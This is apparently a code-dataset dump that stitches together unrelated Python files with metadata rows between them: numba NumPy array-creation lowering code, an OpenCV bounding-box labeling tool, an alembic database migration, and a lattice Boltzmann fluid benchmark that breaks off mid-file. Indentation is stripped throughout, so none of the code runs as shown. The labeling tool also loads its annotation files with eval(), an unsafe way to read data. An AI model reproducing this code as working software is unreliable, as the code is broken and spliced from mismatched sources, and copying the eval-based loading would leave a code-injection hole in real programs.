is_neg = builder.icmp_signed('<', shapes[dim], zero)
with cgutils.if_unlikely(builder, is_neg):
context.call_conv.return_user_exc(builder, ValueError,
("negative dimensions not allowed",))
return arrtype, shapes
def _parse_empty_like_args(context, builder, sig, args):
"""
Parse the arguments of a np.empty_like(), np.zeros_like() or
np.ones_like() call.
"""
arytype = sig.args[0]
ary = make_array(arytype)(context, builder, value=args[0])
shapes = cgutils.unpack_tuple(builder, ary.shape, count=arytype.ndim)
return sig.return_type, shapes
@builtin
@implement(numpy.empty, types.Any)
@implement(numpy.empty, types.Any, types.Any)
def numpy_empty_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.empty_like, types.Kind(types.Array))
@implement(numpy.empty_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_empty_like_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_like_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.zeros, types.Any)
@implement(numpy.zeros, types.Any, types.Any)
def numpy_zeros_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
_zero_fill_array(context, builder, ary)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
@builtin
@implement(numpy.zeros_like, types.Kind(types.Array))
@implement(numpy.zeros_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_zeros_like_nd(context, builder, sig, args):
arrtype, shapes = _parse_empty_like_args(context, builder, sig, args)
ary = _empty_nd_impl(context, builder, arrtype, shapes)
_zero_fill_array(context, builder, ary)
return impl_ret_new_ref(context, builder, sig.return_type, ary._getvalue())
if numpy_version >= (1, 8):
@builtin
@implement(numpy.full, types.Any, types.Any)
def numpy_full_nd(context, builder, sig, args):
def full(shape, value):
arr = numpy.empty(shape)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full, types.Any, types.Any, types.Kind(types.DTypeSpec))
def numpy_full_dtype_nd(context, builder, sig, args):
def full(shape, value, dtype):
arr = numpy.empty(shape, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full_like, types.Kind(types.Array), types.Any)
def numpy_full_like_nd(context, builder, sig, args):
def full_like(arr, value):
arr = numpy.empty_like(arr)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.full_like, types.Kind(types.Array), types.Any, types.Kind(types.DTypeSpec))
def numpy_full_like_nd(context, builder, sig, args):
def full_like(arr, value, dtype):
arr = numpy.empty_like(arr, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = value
return arr
res = context.compile_internal(builder, full_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones, types.Any)
def numpy_ones_nd(context, builder, sig, args):
def ones(shape):
arr = numpy.empty(shape)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
valty = sig.return_type.dtype
res = context.compile_internal(builder, ones, sig, args,
locals={'c': valty})
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones, types.Any, types.Kind(types.DTypeSpec))
def numpy_ones_dtype_nd(context, builder, sig, args):
def ones(shape, dtype):
arr = numpy.empty(shape, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones_like, types.Kind(types.Array))
def numpy_ones_like_nd(context, builder, sig, args):
def ones_like(arr):
arr = numpy.empty_like(arr)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.ones_like, types.Kind(types.Array), types.Kind(types.DTypeSpec))
def numpy_ones_like_dtype_nd(context, builder, sig, args):
def ones_like(arr, dtype):
arr = numpy.empty_like(arr, dtype)
for idx in numpy.ndindex(arr.shape):
arr[idx] = 1
return arr
res = context.compile_internal(builder, ones_like, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.identity, types.Kind(types.Integer))
def numpy_identity(context, builder, sig, args):
def identity(n):
arr = numpy.zeros((n, n))
for i in range(n):
arr[i, i] = 1
return arr
res = context.compile_internal(builder, identity, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.identity, types.Kind(types.Integer), types.Kind(types.DTypeSpec))
def numpy_identity(context, builder, sig, args):
def identity(n, dtype):
arr = numpy.zeros((n, n), dtype)
for i in range(n):
arr[i, i] = 1
return arr
res = context.compile_internal(builder, identity, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n):
return numpy.identity(n)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n, m):
return numpy.eye(n, m, 0, numpy.float64)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer),
types.Kind(types.Integer))
def numpy_eye(context, builder, sig, args):
def eye(n, m, k):
return numpy.eye(n, m, k, numpy.float64)
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.eye, types.Kind(types.Integer), types.Kind(types.Integer),
types.Kind(types.Integer), types.Kind(types.DTypeSpec))
def numpy_eye(context, builder, sig, args):
def eye(n, m, k, dtype):
arr = numpy.zeros((n, m), dtype)
if k >= 0:
d = min(n, m - k)
for i in range(d):
arr[i, i + k] = 1
else:
d = min(n + k, m)
for i in range(d):
arr[i - k, i] = 1
return arr
res = context.compile_internal(builder, eye, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number))
def numpy_arange_1(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(stop):
return numpy.arange(0, stop, 1, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number))
def numpy_arange_2(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(start, stop):
return numpy.arange(start, stop, 1, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Number))
def numpy_arange_3(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def arange(start, stop, step):
return numpy.arange(start, stop, step, dtype)
res = context.compile_internal(builder, arange, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.arange, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Number), types.Kind(types.DTypeSpec))
def numpy_arange_4(context, builder, sig, args):
if any(isinstance(a, types.Complex) for a in sig.args):
def arange(start, stop, step, dtype):
nitems_c = (stop - start) / step
nitems_r = math.ceil(nitems_c.real)
nitems_i = math.ceil(nitems_c.imag)
nitems = max(min(nitems_i, nitems_r), 0)
arr = numpy.empty(nitems, dtype)
val = start
for i in range(nitems):
arr[i] = val
val += step
return arr
else:
def arange(start, stop, step, dtype):
nitems_r = math.ceil((stop - start) / step)
nitems = max(nitems_r, 0)
arr = numpy.empty(nitems, dtype)
val = start
for i in range(nitems):
arr[i] = val
val += step
return arr
res = context.compile_internal(builder, arange, sig, args,
locals={'nitems': types.intp})
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.linspace, types.Kind(types.Number), types.Kind(types.Number))
def numpy_linspace_2(context, builder, sig, args):
def linspace(start, stop):
return numpy.linspace(start, stop, 50)
res = context.compile_internal(builder, linspace, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement(numpy.linspace, types.Kind(types.Number), types.Kind(types.Number),
types.Kind(types.Integer))
def numpy_linspace_3(context, builder, sig, args):
dtype = as_dtype(sig.return_type.dtype)
def linspace(start, stop, num):
arr = numpy.empty(num, dtype)
div = num - 1
delta = stop - start
arr[0] = start
for i in range(1, num):
arr[i] = start + delta * (i / div)
return arr
res = context.compile_internal(builder, linspace, sig, args)
return impl_ret_new_ref(context, builder, sig.return_type, res)
@builtin
@implement("array.copy", types.Kind(types.Array))
def array_copy(context, builder, sig, args):
arytype = sig.args[0]
ary = make_array(arytype)(context, builder, value=args[0])
shapes = cgutils.unpack_tuple(builder, ary.shape)
rettype = sig.return_type
ret = _empty_nd_impl(context, builder, rettype, shapes)
src_data = ary.data
dest_data = ret.data
assert rettype.layout == "C"
if arytype.layout == "C":
# Fast path: memcpy
# Compute array length
arrlen = context.get_constant(types.intp, 1)
for s in shapes:
arrlen = builder.mul(arrlen, s)
arrlen = builder.mul(arrlen, ary.itemsize)
pchar = lc.Type.int(8).as_pointer()
memcpy = builder.module.declare_intrinsic(
'llvm.memcpy', [pchar, pchar, arrlen.type])
builder.call(memcpy,
(builder.bitcast(dest_data, pchar),
builder.bitcast(src_data, pchar),
arrlen,
lc.Constant.int(lc.Type.int(32), 0),
lc.Constant.int(lc.Type.int(1), 0),
))
else:
src_strides = cgutils.unpack_tuple(builder, ary.strides)
dest_strides = cgutils.unpack_tuple(builder, ret.strides)
intp_t = context.get_value_type(types.intp)
with cgutils.loop_nest(builder, shapes, intp_t) as indices:
src_ptr = cgutils.get_item_pointer2(builder, src_data,
shapes, src_strides,
arytype.layout, indices)
dest_ptr = cgutils.get_item_pointer2(builder, dest_data,
shapes, dest_strides,
rettype.layout, indices)
builder.store(builder.load(src_ptr), dest_ptr)
return impl_ret_new_ref(context, builder, sig.return_type, ret._getvalue())
@builtin
@implement(numpy.frombuffer, types.Kind(types.Buffer))
@implement(numpy.frombuffer, types.Kind(types.Buffer), types.Kind(types.DTypeSpec))
def np_frombuffer(context, builder, sig, args):
bufty = sig.args[0]
aryty = sig.return_type
buf = make_array(bufty)(context, builder, value=args[0])
out_ary_ty = make_array(aryty)
out_ary = out_ary_ty(context, builder)
out_datamodel = out_ary._datamodel
itemsize = get_itemsize(context, aryty)
ll_itemsize = lc.Constant.int(buf.itemsize.type, itemsize)
nbytes = builder.mul(buf.nitems, buf.itemsize)
# Check that the buffer size is compatible
rem = builder.srem(nbytes, ll_itemsize)
is_incompatible = cgutils.is_not_null(builder, rem)
with builder.if_then(is_incompatible, likely=False):
msg = "buffer size must be a multiple of element size"
context.call_conv.return_user_exc(builder, ValueError, (msg,))
shape = cgutils.pack_array(builder, [builder.sdiv(nbytes, ll_itemsize)])
strides = cgutils.pack_array(builder, [ll_itemsize])
data = builder.bitcast(buf.data,
context.get_value_type(out_datamodel.get_type('data')))
populate_array(out_ary,
data=data,
shape=shape,
strides=strides,
itemsize=ll_itemsize,
meminfo=buf.meminfo,
parent=buf.parent,)
res = out_ary._getvalue()
return impl_ret_borrowed(context, builder, sig.return_type, res)
# -----------------------------------------------------------------------------
# Sorting
_sorting_init = False
def lt_floats(a, b):
return math.isnan(b) or a < b
def load_sorts():
"""
    Load quicksort lazily, to avoid circular imports across the jit() global.
"""
g = globals()
if g['_sorting_init']:
return
default_quicksort = quicksort.make_jit_quicksort()
g['run_default_quicksort'] = default_quicksort.run_quicksort
float_quicksort = quicksort.make_jit_quicksort(lt=lt_floats)
g['run_float_quicksort'] = float_quicksort.run_quicksort
g['_sorting_init'] = True
@builtin
@implement("array.sort", types.Kind(types.Array))
def array_sort(context, builder, sig, args):
load_sorts()
arytype = sig.args[0]
dtype = arytype.dtype
if isinstance(dtype, types.Float):
def array_sort_impl(arr):
return run_float_quicksort(arr)
else:
def array_sort_impl(arr):
return run_default_quicksort(arr)
return context.compile_internal(builder, array_sort_impl, sig, args)
@builtin
@implement(numpy.sort, types.Kind(types.Array))
def np_sort(context, builder, sig, args):
def np_sort_impl(a):
res = a.copy()
res.sort()
return res
return context.compile_internal(builder, np_sort_impl, sig, args)
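# Illustrative usage only (not part of this lowering module): the
# implementations registered above are what make array calls like the
# following work inside numba-compiled functions; `njit` is assumed to come
# from numba's public API.
#
#     from numba import njit
#
#     @njit
#     def demo(a):
#         idx = numpy.nonzero(a > 0)
#         b = a.copy()
#         b.sort()
#         return idx, b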
| bsd-2-clause | -1,622,536,346,280,335,400 | 34.741639 | 96 | 0.599943 | false | 3.689943 | false | false | false |
frombeijingwithlove/dlcv_for_beginners | chap6/bbox_labeling/bbox_labeling.py | 1 | 7575 | import os
import cv2
from tkFileDialog import askdirectory
from tkMessageBox import askyesno
WINDOW_NAME = 'Simple Bounding Box Labeling Tool'
FPS = 24
SUPPORTED_FORMATS = ['jpg', 'jpeg', 'png']
DEFAULT_COLOR = {'Object': (255, 0, 0)}
COLOR_GRAY = (192, 192, 192)
BAR_HEIGHT = 16
KEY_UP = 65362
KEY_DOWN = 65364
KEY_LEFT = 65361
KEY_RIGHT = 65363
KEY_ESC = 27
KEY_DELETE = 65535
KEY_EMPTY = 0
get_bbox_name = '{}.bbox'.format
class SimpleBBoxLabeling:
def __init__(self, data_dir, fps=FPS, window_name=None):
self._data_dir = data_dir
self.fps = fps
self.window_name = window_name if window_name else WINDOW_NAME
self._pt0 = None
self._pt1 = None
self._drawing = False
self._cur_label = None
self._bboxes = []
label_path = '{}.labels'.format(self._data_dir)
self.label_colors = DEFAULT_COLOR if not os.path.exists(label_path) else self.load_labels(label_path)
        imagefiles = [x for x in os.listdir(self._data_dir) if x[x.rfind('.') + 1:].lower() in SUPPORTED_FORMATS]
        labeled = [x for x in imagefiles if os.path.exists(os.sep.join([self._data_dir, get_bbox_name(x)]))]
to_be_labeled = [x for x in imagefiles if x not in labeled]
self._filelist = labeled + to_be_labeled
self._index = len(labeled)
if self._index > len(self._filelist) - 1:
self._index = len(self._filelist) - 1
def _mouse_ops(self, event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN:
self._drawing = True
self._pt0 = (x, y)
elif event == cv2.EVENT_LBUTTONUP:
self._drawing = False
self._pt1 = (x, y)
self._bboxes.append((self._cur_label, (self._pt0, self._pt1)))
elif event == cv2.EVENT_MOUSEMOVE:
self._pt1 = (x, y)
elif event == cv2.EVENT_RBUTTONUP:
if self._bboxes:
self._bboxes.pop()
def _clean_bbox(self):
self._pt0 = None
self._pt1 = None
self._drawing = False
self._bboxes = []
def _draw_bbox(self, img):
h, w = img.shape[:2]
canvas = cv2.copyMakeBorder(img, 0, BAR_HEIGHT, 0, 0, cv2.BORDER_CONSTANT, value=COLOR_GRAY)
label_msg = '{}: {}, {}'.format(self._cur_label, self._pt0, self._pt1) \
if self._drawing \
else 'Current label: {}'.format(self._cur_label)
msg = '{}/{}: {} | {}'.format(self._index + 1, len(self._filelist), self._filelist[self._index], label_msg)
cv2.putText(canvas, msg, (1, h+12),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, (0, 0, 0), 1)
for label, (bpt0, bpt1) in self._bboxes:
label_color = self.label_colors[label] if label in self.label_colors else COLOR_GRAY
cv2.rectangle(canvas, bpt0, bpt1, label_color, thickness=2)
cv2.putText(canvas, label, (bpt0[0]+3, bpt0[1]+15),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, label_color, 2)
if self._drawing:
label_color = self.label_colors[self._cur_label] if self._cur_label in self.label_colors else COLOR_GRAY
if self._pt1[0] >= self._pt0[0] and self._pt1[1] >= self._pt0[1]:
cv2.rectangle(canvas, self._pt0, self._pt1, label_color, thickness=2)
cv2.putText(canvas, self._cur_label, (self._pt0[0] + 3, self._pt0[1] + 15),
cv2.FONT_HERSHEY_SIMPLEX,
0.5, label_color, 2)
return canvas
@staticmethod
def export_bbox(filepath, bboxes):
if bboxes:
with open(filepath, 'w') as f:
for bbox in bboxes:
line = repr(bbox) + '\n'
f.write(line)
elif os.path.exists(filepath):
os.remove(filepath)
@staticmethod
def load_bbox(filepath):
bboxes = []
with open(filepath, 'r') as f:
line = f.readline().rstrip()
while line:
bboxes.append(eval(line))
line = f.readline().rstrip()
return bboxes
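    # Illustrative example of the on-disk format handled by export_bbox() and
    # load_bbox(): one repr()'d (label, (pt0, pt1)) tuple per line, so a file
    # such as "001.jpg.bbox" could contain (coordinates made up):
    #   ('Object', ((35, 40), (180, 220)))
    #   ('Object', ((210, 60), (300, 150)))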
@staticmethod
def load_labels(filepath):
label_colors = {}
with open(filepath, 'r') as f:
line = f.readline().rstrip()
while line:
label, color = eval(line)
label_colors[label] = color
line = f.readline().rstrip()
return label_colors
@staticmethod
def load_sample(filepath):
img = cv2.imread(filepath)
bbox_filepath = get_bbox_name(filepath)
bboxes = []
if os.path.exists(bbox_filepath):
bboxes = SimpleBBoxLabeling.load_bbox(bbox_filepath)
return img, bboxes
def _export_n_clean_bbox(self):
bbox_filepath = os.sep.join([self._data_dir, get_bbox_name(self._filelist[self._index])])
self.export_bbox(bbox_filepath, self._bboxes)
self._clean_bbox()
def _delete_current_sample(self):
filename = self._filelist[self._index]
filepath = os.sep.join([self._data_dir, filename])
if os.path.exists(filepath):
os.remove(filepath)
filepath = get_bbox_name(filepath)
if os.path.exists(filepath):
os.remove(filepath)
self._filelist.pop(self._index)
print('{} is deleted!'.format(filename))
def start(self):
last_filename = ''
label_index = 0
labels = self.label_colors.keys()
n_labels = len(labels)
cv2.namedWindow(self.window_name)
cv2.setMouseCallback(self.window_name, self._mouse_ops)
key = KEY_EMPTY
delay = int(1000 / FPS)
while key != KEY_ESC:
if key == KEY_UP:
if label_index == 0:
pass
else:
label_index -= 1
elif key == KEY_DOWN:
if label_index == n_labels - 1:
pass
else:
label_index += 1
elif key == KEY_LEFT:
if self._index > 0:
self._export_n_clean_bbox()
self._index -= 1
if self._index < 0:
self._index = 0
elif key == KEY_RIGHT:
if self._index < len(self._filelist) - 1:
self._export_n_clean_bbox()
self._index += 1
if self._index > len(self._filelist) - 1:
self._index = len(self._filelist) - 1
elif key == KEY_DELETE:
if askyesno('Delete Sample', 'Are you sure?'):
self._delete_current_sample()
key = KEY_EMPTY
continue
filename = self._filelist[self._index]
if filename != last_filename:
filepath = os.sep.join([self._data_dir, filename])
img, self._bboxes = self.load_sample(filepath)
self._cur_label = labels[label_index]
canvas = self._draw_bbox(img)
cv2.imshow(self.window_name, canvas)
key = cv2.waitKey(delay)
last_filename = filename
print('Finished!')
cv2.destroyAllWindows()
self.export_bbox(os.sep.join([self._data_dir, get_bbox_name(filename)]), self._bboxes)
print('Labels updated!')
if __name__ == '__main__':
dir_with_images = askdirectory(title='Where are the images?')
labeling_task = SimpleBBoxLabeling(dir_with_images)
labeling_task.start()
| bsd-3-clause | 2,674,751,870,218,334,700 | 32.223684 | 116 | 0.532937 | false | 3.620937 | false | false | false |
teampopong/pokr.kr | alembic/versions/3e683fc1af11_region_id_field_of_meetings_table.py | 1 | 1559 | # -*- coding: utf-8 -*-
"""region_id field of 'meetings' table
Revision ID: 3e683fc1af11
Revises: 2f08fb65fe0b
Create Date: 2014-05-24 21:31:25.378918
"""
from __future__ import unicode_literals
# revision identifiers, used by Alembic.
revision = '3e683fc1af11'
down_revision = '2f08fb65fe0b'
from alembic import op
from sqlalchemy.sql import table, column
import sqlalchemy as sa
region = table('region',
column('id', sa.String(16)),
column('name', sa.Unicode(20)),
column('name_en', sa.String(80)),
)
def upgrade():
op.alter_column('meeting', 'id', type_=sa.BigInteger, autoincrement=False)
op.alter_column('meeting_attendee', 'meeting_id', type_=sa.BigInteger)
op.alter_column('statement', 'meeting_id', type_=sa.BigInteger)
op.add_column('meeting', sa.Column('region_id', sa.String(length=16)))
op.create_index(op.f('ix_meeting_region_id'), 'meeting', ['region_id'], unique=False)
op.execute(
region.insert()\
.values({
'id': '0',
'name': '대한민국',
'name_en': 'national',
})
)
def downgrade():
op.alter_column('meeting', 'id', type_=sa.Integer, autoincrement=True)
op.alter_column('meeting_attendee', 'meeting_id', type_=sa.Integer)
op.alter_column('statement', 'meeting_id', type_=sa.Integer)
op.drop_index(op.f('ix_meeting_region_id'), table_name='meeting')
op.drop_column('meeting', 'region_id')
op.execute(
region.delete()\
.where(region.c.id == '0')
)
| apache-2.0 | -873,324,810,509,578,100 | 27.722222 | 89 | 0.620245 | false | 3.05315 | false | false | false |
Ektorus/bohrium | ve/cpu/tools/locate.py | 1 | 8762 | from __future__ import print_function
## 3D Lattice Boltzmann (BGK) model of a fluid.
## D3Q19 model. At each timestep, particle densities propagate
## outwards in the directions indicated in the figure. An
## equivalent 'equilibrium' density is found, and the densities
## relax towards that state, in a proportion governed by omega.
## Iain Haslam, March 2006.
import util
if util.Benchmark().bohrium:
import bohrium as np
else:
import numpy as np
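# A minimal sketch (not part of the original benchmark) of the BGK collision
# step described in the header comment above: particle densities F relax
# towards the equilibrium densities FEQ in a proportion governed by omega.
# The function name and signature are illustrative; main() below performs the
# same update in-place on its 19-component arrays (F *= (1-omega); F += omega*FEQ).
def bgk_relax(F, FEQ, omega):
    return (1.0 - omega) * F + omega * FEQ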
def main():
B = util.Benchmark()
nx = B.size[0]
ny = B.size[1]
nz = B.size[2]
ITER = B.size[3]
NO_OBST = 1
omega = 1.0
density = 1.0
deltaU = 1e-7
t1 = 1/3.0
t2 = 1/18.0
t3 = 1/36.0
B.start()
F = np.ones((19, nx, ny, nz), dtype=np.float64)
F[:] = density/19.0
FEQ = np.ones((19, nx, ny, nz), dtype=np.float64)
FEQ[:] = density/19.0
T = np.zeros((19, nx, ny, nz), dtype=np.float64)
#Create the scenery.
BOUND = np.zeros((nx, ny, nz), dtype=np.float64)
BOUNDi = np.ones((nx, ny, nz), dtype=np.float64)
"""
if not NO_OBST:
for i in xrange(nx):
for j in xrange(ny):
for k in xrange(nz):
if ((i-4)**2+(j-5)**2+(k-6)**2) < 6:
BOUND[i,j,k] += 1.0
BOUNDi[i,j,k] += 0.0
BOUND[:,0,:] += 1.0
BOUNDi[:,0,:] *= 0.0
"""
if util.Benchmark().bohrium:
np.flush()
for ts in xrange(0, ITER):
##Propagate / Streaming step
T[:] = F
#nearest-neighbours
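        # (each assignment below moves one density component a single cell
        #  along its propagation direction, with periodic wrap-around at the
        #  domain edges; e.g. F[1] streams in +z: wrapped plane first, then
        #  the bulk of the array)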
F[1,:,:,0] = T[1,:,:,-1]
F[1,:,:,1:] = T[1,:,:,:-1]
F[2,:,:,:-1] = T[2,:,:,1:]
F[2,:,:,-1] = T[2,:,:,0]
F[3,:,0,:] = T[3,:,-1,:]
F[3,:,1:,:] = T[3,:,:-1,:]
F[4,:,:-1,:] = T[4,:,1:,:]
F[4,:,-1,:] = T[4,:,0,:]
F[5,0,:,:] = T[5,-1,:,:]
F[5,1:,:,:] = T[5,:-1,:,:]
F[6,:-1,:,:] = T[6,1:,:,:]
F[6,-1,:,:] = T[6,0,:,:]
#next-nearest neighbours
F[7,0 ,0 ,:] = T[7,-1 , -1,:]
F[7,0 ,1:,:] = T[7,-1 ,:-1,:]
F[7,1:,0 ,:] = T[7,:-1, -1,:]
F[7,1:,1:,:] = T[7,:-1,:-1,:]
F[8,0 ,:-1,:] = T[8,-1 ,1:,:]
F[8,0 , -1,:] = T[8,-1 ,0 ,:]
F[8,1:,:-1,:] = T[8,:-1,1:,:]
F[8,1:, -1,:] = T[8,:-1,0 ,:]
F[9,:-1,0 ,:] = T[9,1:, -1,:]
F[9,:-1,1:,:] = T[9,1:,:-1,:]
F[9,-1 ,0 ,:] = T[9,0 , 0,:]
F[9,-1 ,1:,:] = T[9,0 ,:-1,:]
F[10,:-1,:-1,:] = T[10,1:,1:,:]
F[10,:-1, -1,:] = T[10,1:,0 ,:]
F[10,-1 ,:-1,:] = T[10,0 ,1:,:]
F[10,-1 , -1,:] = T[10,0 ,0 ,:]
F[11,0 ,:,0 ] = T[11,0 ,:, -1]
F[11,0 ,:,1:] = T[11,0 ,:,:-1]
F[11,1:,:,0 ] = T[11,:-1,:, -1]
F[11,1:,:,1:] = T[11,:-1,:,:-1]
F[12,0 ,:,:-1] = T[12, -1,:,1:]
F[12,0 ,:, -1] = T[12, -1,:,0 ]
F[12,1:,:,:-1] = T[12,:-1,:,1:]
F[12,1:,:, -1] = T[12,:-1,:,0 ]
F[13,:-1,:,0 ] = T[13,1:,:, -1]
F[13,:-1,:,1:] = T[13,1:,:,:-1]
F[13, -1,:,0 ] = T[13,0 ,:, -1]
F[13, -1,:,1:] = T[13,0 ,:,:-1]
F[14,:-1,:,:-1] = T[14,1:,:,1:]
F[14,:-1,:, -1] = T[14,1:,:,0 ]
F[14,-1 ,:,:-1] = T[14,0 ,:,1:]
F[14,-1 ,:, -1] = T[14,0 ,:,0 ]
F[15,:,0 ,0 ] = T[15,:, -1, -1]
F[15,:,0 ,1:] = T[15,:, -1,:-1]
F[15,:,1:,0 ] = T[15,:,:-1, -1]
F[15,:,1:,1:] = T[15,:,:-1,:-1]
F[16,:,0 ,:-1] = T[16,:, -1,1:]
F[16,:,0 , -1] = T[16,:, -1,0 ]
F[16,:,1:,:-1] = T[16,:,:-1,1:]
F[16,:,1:, -1] = T[16,:,:-1,0 ]
F[17,:,:-1,0 ] = T[17,:,1:, -1]
F[17,:,:-1,1:] = T[17,:,1:,:-1]
F[17,:, -1,0 ] = T[17,:,0 , -1]
F[17,:, -1,1:] = T[17,:,0 ,:-1]
F[18,:,:-1,:-1] = T[18,:,1:,1:]
F[18,:,:-1, -1] = T[18,:,1:,0 ]
F[18,:,-1 ,:-1] = T[18,:,0 ,1:]
F[18,:,-1 , -1] = T[18,:,0 ,0 ]
#Densities bouncing back at next timestep
        BB = np.zeros(F.shape, dtype=np.float64)  # start from zero: filled below via +=
T[:] = F
T[1:,:,:,:] *= BOUND[np.newaxis,:,:,:]
BB[2 ,:,:,:] += T[1 ,:,:,:]
BB[1 ,:,:,:] += T[2 ,:,:,:]
BB[4 ,:,:,:] += T[3 ,:,:,:]
BB[3 ,:,:,:] += T[4 ,:,:,:]
BB[6 ,:,:,:] += T[5 ,:,:,:]
BB[5 ,:,:,:] += T[6 ,:,:,:]
BB[10,:,:,:] += T[7 ,:,:,:]
BB[9 ,:,:,:] += T[8 ,:,:,:]
BB[8 ,:,:,:] += T[9 ,:,:,:]
BB[7 ,:,:,:] += T[10,:,:,:]
BB[14,:,:,:] += T[11,:,:,:]
BB[13,:,:,:] += T[12,:,:,:]
BB[12,:,:,:] += T[13,:,:,:]
BB[11,:,:,:] += T[14,:,:,:]
BB[18,:,:,:] += T[15,:,:,:]
BB[17,:,:,:] += T[16,:,:,:]
BB[16,:,:,:] += T[17,:,:,:]
BB[15,:,:,:] += T[18,:,:,:]
        # Relax: calculate equilibrium state (FEQ) with equivalent speed and density to F
DENSITY = np.add.reduce(F)
#UX = F[5,:,:,:].copy()
UX = np.ones(F[5,:,:,:].shape, dtype=np.float64)
UX[:,:,:] = F[5,:,:,:]
UX += F[7,:,:,:]
UX += F[8,:,:,:]
UX += F[11,:,:,:]
UX += F[12,:,:,:]
UX -= F[6,:,:,:]
UX -= F[9,:,:,:]
UX -= F[10,:,:,:]
UX -= F[13,:,:,:]
UX -= F[14,:,:,:]
UX /=DENSITY
#UY = F[3,:,:,:].copy()
UY = np.ones(F[3,:,:,:].shape, dtype=np.float64)
UY[:,:,:] = F[3,:,:,:]
UY += F[7,:,:,:]
UY += F[9,:,:,:]
UY += F[15,:,:,:]
UY += F[16,:,:,:]
UY -= F[4,:,:,:]
UY -= F[8,:,:,:]
UY -= F[10,:,:,:]
UY -= F[17,:,:,:]
UY -= F[18,:,:,:]
UY /=DENSITY
#UZ = F[1,:,:,:].copy()
UZ = np.ones(F[1,:,:,:].shape, dtype=np.float64)
UZ[:,:,:] = F[1,:,:,:]
UZ += F[11,:,:,:]
UZ += F[13,:,:,:]
UZ += F[15,:,:,:]
UZ += F[17,:,:,:]
UZ -= F[2,:,:,:]
UZ -= F[12,:,:,:]
UZ -= F[14,:,:,:]
UZ -= F[16,:,:,:]
UZ -= F[18,:,:,:]
UZ /=DENSITY
UX[0,:,:] += deltaU #Increase inlet pressure
        #Set boundaries to zero.
UX[:,:,:] *= BOUNDi
UY[:,:,:] *= BOUNDi
UZ[:,:,:] *= BOUNDi
DENSITY[:,:,:] *= BOUNDi
U_SQU = UX**2 + UY**2 + UZ**2
# Calculate equilibrium distribution: stationary
FEQ[0,:,:,:] = (t1*DENSITY)*(1.0-3.0*U_SQU/2.0)
# nearest-neighbours
T1 = 3.0/2.0*U_SQU
tDENSITY = t2*DENSITY
FEQ[1,:,:,:]=tDENSITY*(1.0 + 3.0*UZ + 9.0/2.0*UZ**2 - T1)
FEQ[2,:,:,:]=tDENSITY*(1.0 - 3.0*UZ + 9.0/2.0*UZ**2 - T1)
FEQ[3,:,:,:]=tDENSITY*(1.0 + 3.0*UY + 9.0/2.0*UY**2 - T1)
FEQ[4,:,:,:]=tDENSITY*(1.0 - 3.0*UY + 9.0/2.0*UY**2 - T1)
